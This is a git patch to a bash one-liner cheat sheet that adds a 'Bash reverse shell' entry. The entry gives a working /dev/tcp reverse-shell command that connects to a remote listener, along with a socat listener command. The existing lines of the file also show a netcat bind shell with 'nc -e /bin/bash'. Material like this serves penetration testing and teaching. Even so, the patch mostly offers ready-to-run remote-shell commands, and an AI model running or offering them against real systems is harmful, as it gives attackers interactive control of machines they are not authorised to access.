From 2ed0048a28e79db3566bc138b85bedccd21af0c0 Mon Sep 17 00:00:00 2001 From: David Busby Date: Fri, 6 Jun 2014 14:30:16 +0100 Subject: [PATCH] Bash reverse tcp example in scripting/bash onliner --- scripting/bash.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/scripting/bash.md b/scripting/bash.md index abf1347..3a54e14 100644 --- a/scripting/bash.md +++ b/scripting/bash.md @@ -113,6 +113,20 @@ nc -e /bin/bash -lp *port* cat /proc/cpuinfo ``` +**Bash reverse shell** (@icleus) +Works on all distrobutions where egress filtering is not in place / quiet open, use this to reverse connect to your lsitening host. + +```bash +bash -i>& /dev/tcp/123.123.123.123/1234 0>&1 & +``` + +I find this best works with a socat listener due to the readline support. + +```bash +socat readline TCP-LISTEN:1234 +``` + + Credits ----------- Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions)